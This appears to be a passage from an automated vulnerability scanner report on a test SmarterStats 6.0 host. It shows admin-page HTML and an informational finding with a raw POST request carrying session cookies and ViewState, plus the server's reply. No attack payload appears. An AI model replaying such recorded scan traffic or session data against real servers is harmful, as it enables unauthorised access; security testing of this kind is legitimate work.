               <li class='hmItem hmLast' id='ctl00_MPH_ctl04_hm2' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
           </ul>
           <div class='hmScrollDown'></div></div>
           </div>
           </span>
                   
<div class="HyperGridWrapper" id="ctl00_MPH_grdImportFilters">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdImportFilters_Table"><tr><td class="NoItems" colspan="0">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_grdImportFilters_HiddenInput" id="ctl00_MPH_grdImportFilters_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_grdImportFilters_HiddenLSR" id="ctl00_MPH_grdImportFilters_HiddenLSR" value="" />
</div>
</div>

               </span></div>
       
               <div id='ctl00_MPH_DynamicPagesTab' class='' style='display:none'>
           <span id="ctl00_MPH_DynamicPagesTab">
                   <span id="ctl00_MPH_ctxDynamicPages">
<!-- HyperMenu -->
           <div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl05' name='ctl00$MPH$ctl05' style='z-index:800'>
               <li class='hmItem hmFirst' id='ctl00_MPH_ctl05_hm0' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Add<span class='hmArrow'></span></a>
               <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
                   <li class='hmItem hmFirst' id='ctl00_MPH_ctl05_hm0_hm0' style='z-index: 800'><a class='hmA' href='#'>Import Filter</a></li>
                   <li class='hmItem hmLast' id='ctl00_MPH_ctl05_hm0_hm1' style='z-index: 800'><a class='hmA' href='#'>Dynamic Page</a></li>
               </ul><div class='hmScrollDown'></div></div>
               </li>
               <li class='hmItem' id='ctl00_MPH_ctl05_hm1' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
               <li class='hmItem hmLast' id='ctl00_MPH_ctl05_hm2' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
           </ul>
           <div class='hmScrollDown'></div></div>
           </div>
           </span>
                   
<div class="HyperGridWrapper" id="ctl00_MPH_grdDynamicPages">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdDynamicPages_Table"><tr><td class="NoItems" colspan="0">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_grdDynamicPages_HiddenInput" id="ctl00_MPH_grdDynamicPages_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_grdDynamicPages_HiddenLSR" id="ctl00_MPH_grdDynamicPages_HiddenLSR" value="" />
</div>
</div>

               </span></div>
       
           </div>
   
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmimportsettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">

function ShowReprocessPopup()
{
SpawnHyperWindow("/Client/Popups/frmReprocess.aspx", 300, 200, DoRefreshAfterReprocess);
}
function TabChanged(tabSelected)
{
       (tabSelected.attr('id') != "ctl00_TPH_HyperTabStrip1_HyperTabItem3") ? $("#divImportFilterButtons").hide() : $("#divImportFilterButtons").show();
       (tabSelected.attr('id') != "ctl00_TPH_HyperTabStrip1_HyperTabItem4") ? $("#divDynamicPagesButtons").hide() : $("#divDynamicPagesButtons").show();
}
function PopupImportFilter(url) {
SpawnHyperWindow(url, 430, 200, DoRefresh);
}
function PopupImportDynamicPage(url) {
SpawnHyperWindow(url, 440, 370, DoRefresh);
}
function DoRefresh() {
__doPostBack('ctl00$MPH$lnkRefresh','')
}
function DoRefreshAfterReprocess() {
__doPostBack('ctl00$MPH$lnkRefreshAfterReprocessing','')
}

   </script>


   

<script type="text/javascript">
//<![CDATA[

function ShowContextMenu_ctl00_MPH_ctl04(evt) {
   $('#ctl00_MPH_ctl04').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}

function ShowContextMenu_ctl00_MPH_ctl05(evt) {
   $('#ctl00_MPH_ctl05').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}

function DelayedSetupctl00_MPH_grdImportFilters() { }
if (self.ctl00_MPH_grdImportFiltersHGIsCallback)
   DelayedSetupctl00_MPH_grdImportFilters();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdImportFilters, 100);});
self.ctl00_MPH_grdImportFiltersHGIsCallback = true;

function DelayedSetupctl00_MPH_grdDynamicPages() { }
if (self.ctl00_MPH_grdDynamicPagesHGIsCallback)
   DelayedSetupctl00_MPH_grdDynamicPages();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdDynamicPages, 100);});
self.ctl00_MPH_grdDynamicPagesHGIsCallback = true;
$(function() { SetTopTitle('Site\x20Importing'); });
$(function() { $('#ctl00_BPH_mnuAdd').hyperMenu({"ClearFloat":false,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_BPH_mnuAdd_btnAdd_btnExclusion":"PopupImportFilter(\u0027/Client/Popups/frmImportFilter.aspx?UniqueID=62163e92b4114ce98972e4e87dbca8ca\u0027);","ctl00_BPH_mnuAdd_btnAdd_btnDynamicPage":"PopupImportDynamicPage(\u0027/Client/Popups/frmImportDynamicPage.aspx?UniqueID=62163e92b4114ce98972e4e87dbca8ca\u0027);"},"ClientCallbacks":{}}); });
function DoEdit_ctl00_BPH_btnEditImportFilters() {
   if(self.ctl00_MPH_grdImportFilters == null || !self.ctl00_MPH_grdImportFilters.InitializeGrid) return ShowAlertWindow('No item has been selected');
   if (ctl00_MPH_grdImportFilters.GetUrlForSelectedRow == null) return;
   var url = ctl00_MPH_grdImportFilters.GetUrlForSelectedRow();
   if (url != null) { var grid = ctl00_MPH_grdImportFilters; var row = grid.GetSelectedRows()[0]; if (grid.GetVisibleRowByUid) row = grid.GetVisibleRowByUid(row); grid.DoDoubleClick(grid, row); }
   else {
       if (ctl00_MPH_grdImportFilters.GetSelectedRows().length == 0) ShowAlertWindow('No item has been selected');
       else ShowAlertWindow('You cannot edit multiple items at once.');
   }
}
function DoDeleteQuery_ctl00_BPH_btnDeleteImportFilters() {
   if (!self.ctl00_MPH_grdImportFilters) return ShowAlertWindow('No item has been selected');
   var count = ctl00_MPH_grdImportFilters.GetSelectedRowCount ? ctl00_MPH_grdImportFilters.GetSelectedRowCount() : ctl00_MPH_grdImportFilters.GetSelectedRows().length;
   if (count == 0) return ShowAlertWindow('No item has been selected');
   else parent.ShowConfirmWindow('Are you sure you want to delete the {0} selected item(s)?',count,'Generic',DoDelete_ctl00_BPH_btnDeleteImportFilters);
}
function DoDelete_ctl00_BPH_btnDeleteImportFilters() { __doPostBack('ctl00$BPH$btnDeleteImportFilters',''); }
function DoEdit_ctl00_BPH_btnEditDynamicPages() {
   if(self.ctl00_MPH_grdDynamicPages == null || !self.ctl00_MPH_grdDynamicPages.InitializeGrid) return ShowAlertWindow('No item has been selected');
   if (ctl00_MPH_grdDynamicPages.GetUrlForSelectedRow == null) return;
   var url = ctl00_MPH_grdDynamicPages.GetUrlForSelectedRow();
   if (url != null) { var grid = ctl00_MPH_grdDynamicPages; var row = grid.GetSelectedRows()[0]; if (grid.GetVisibleRowByUid) row = grid.GetVisibleRowByUid(row); grid.DoDoubleClick(grid, row); }
   else {
       if (ctl00_MPH_grdDynamicPages.GetSelectedRows().length == 0) ShowAlertWindow('No item has been selected');
       else ShowAlertWindow('You cannot edit multiple items at once.');
   }
}
function DoDeleteQuery_ctl00_BPH_btnDeleteDynamicPages() {
   if (!self.ctl00_MPH_grdDynamicPages) return ShowAlertWindow('No item has been selected');
   var count = ctl00_MPH_grdDynamicPages.GetSelectedRowCount ? ctl00_MPH_grdDynamicPages.GetSelectedRowCount() : ctl00_MPH_grdDynamicPages.GetSelectedRows().length;
   if (count == 0) return ShowAlertWindow('No item has been selected');
   else parent.ShowConfirmWindow('Are you sure you want to delete the {0} selected item(s)?',count,'Generic',DoDelete_ctl00_BPH_btnDeleteDynamicPages);
}
function DoDelete_ctl00_BPH_btnDeleteDynamicPages() { __doPostBack('ctl00$BPH$btnDeleteDynamicPages',''); }
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_IgnoreItemsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_ImportFilteringTab","ctl00_TPH_HyperTabStrip1_HyperTabItem4":"ctl00_MPH_DynamicPagesTab"},"ClientCallbacks":{"onTabChanged":"TabChanged"}}); });
modules['vmOptional_txt']='Value is optional';
$(function() {$vc({"lt":"Site Url","vcID":"ctl00_MPH_txtDomainUrl_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Query String Items to Ignore","vcID":"ctl00_MPH_txtQueryStringItemsToIgnore_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() { $('#ctl00_MPH_ctl04').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_ctl04_hm0":"__doPostBack(\u0027ctl00$BPH$mnuAdd\u0027,\u0027ctl00_BPH_mnuAdd_btnAdd\u0027)","ctl00_MPH_ctl04_hm0_hm0":"PopupImportFilter(\u0027/Client/Popups/frmImportFilter.aspx?UniqueID=62163e92b4114ce98972e4e87dbca8ca\u0027);","ctl00_MPH_ctl04_hm0_hm1":"PopupImportDynamicPage(\u0027/Client/Popups/frmImportDynamicPage.aspx?UniqueID=62163e92b4114ce98972e4e87dbca8ca\u0027);","ctl00_MPH_ctl04_hm1":"DoEdit_ctl00_BPH_btnEditImportFilters();","ctl00_MPH_ctl04_hm2":"DoDeleteQuery_ctl00_BPH_btnDeleteImportFilters();"},"ClientCallbacks":{}}); });
$(function() { $('#ctl00_MPH_ctl05').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_ctl05_hm0":"__doPostBack(\u0027ctl00$BPH$mnuAdd\u0027,\u0027ctl00_BPH_mnuAdd_btnAdd\u0027)","ctl00_MPH_ctl05_hm0_hm0":"PopupImportFilter(\u0027/Client/Popups/frmImportFilter.aspx?UniqueID=62163e92b4114ce98972e4e87dbca8ca\u0027);","ctl00_MPH_ctl05_hm0_hm1":"PopupImportDynamicPage(\u0027/Client/Popups/frmImportDynamicPage.aspx?UniqueID=62163e92b4114ce98972e4e87dbca8ca\u0027);","ctl00_MPH_ctl05_hm1":"DoEdit_ctl00_BPH_btnEditDynamicPages();","ctl00_MPH_ctl05_hm2":"DoDeleteQuery_ctl00_BPH_btnDeleteDynamicPages();"},"ClientCallbacks":{}}); });
//]]>
</script>
</form>
</body>
</html>


11.8. http://vulnerable.smarterstats.6.0.host:9999/Client/frmSeoSettings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmSeoSettings.aspx

Request

POST /Client/frmSeoSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmSeoSettings.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 8021

__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem2&ctl00%24MPH%24VisiblePage=ctl00_MPH_SearchEnginesTab&ctl00%24MPH%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%247=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2410=on&__VIEWSTATE=%2fwEPDwUJMTIwMjc0MzU0DxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8DaGQCBw9kFgJmD2QWAgIBDxYCHwNoFgICAQ8WAh4EVGV4dGVkAgkPZBYCAgEPZBYCZg9kFgICAQ9kFgQCAg9kFgQCAQ8WAh8DaGQCBQ9kFgJmD2QWAgIBD2QWAmYPEA8WCh4NRGF0YVRleHRGaWVsZAUEbmFtZR4ORGF0YVZhbHVlRmllbGQFAmlkHgtfIURhdGFCb3VuZGceCENzc0NsYXNzBQxDaGVja2JveExpc3QeBF8hU0ICAmQQFRYGR29vZ2xlBVlhaG9vA0FzawRCaW5nC0dvb2dsZSAoQVUpC0dvb2dsZSAoQlIpC0dvb2dsZSAoQ0EpC0dvb2dsZSAoQ04pC0dvb2dsZSAoREUpC0dvb2dsZSAoRVMpC0dvb2dsZSAoRlIpC0dvb2dsZSAoSEspC0dvb2dsZSAoSU4pC0dvb2dsZSAoSUwpC0dvb2dsZSAoSVQpC0dvb2dsZSAoSlApC0dvb2dsZSAoS1IpC0dvb2dsZSAoTVgpC0dvb2dsZSAoTkwpC0dvb2dsZSAoVFcpC0dvb2dsZSAoUlUpC0dvb2dsZSAoVUspFRYBMQEyATQBNQE3ATgBOQIxMAIxMQIxMgIxMwIxNAIxNQIxNgIxNwIxOAIxOQIyMAIyMQIyMgIyNAIyMxQrAxZnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCBA9kFgICAQ9kFgRmD2QWAgIBD2QWAgICDw8WAh8EBQNOL0FkZAIBD2QWAgIBD2QWAmYPEGQQFQAVABQrAwAWAGQYAwUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFhcFKmN0bDAwJE1QSCRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMAUqY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxBSpjdGwwMCRNUEgkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIFKmN0bDAwJE1QSCRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMwUqY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ0BSpjdGwwMCRNUEgkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDUFKmN0bDAwJE1QSCRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNgUqY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ3BSpjdGwwMCRNUEgkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDgFKmN0bDAwJE1QSCRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkOQUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMAUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMQUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMgUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMwUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNAUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNQUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNgUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNwUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOAUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOQUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMAUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQUrY3RsMDAkTVBIJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTEPMtsLAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAA1AV2ViSW50ZXJmYWNlAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMg8y4gsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAADkBTZWFyY2hFbmdpbmVzAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAQU2VhcmNoRW5naW5lc1RhYgtk7P9cHbJRho%2feZ6ho5ilLiM%2fVKcLb3S%2bSDDOyAjIcleQ%3d&ctl00%24MPH%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2415=on

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:04:42 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:04:42 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18930
Connection: Close



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SEO Settings - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmSeoSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
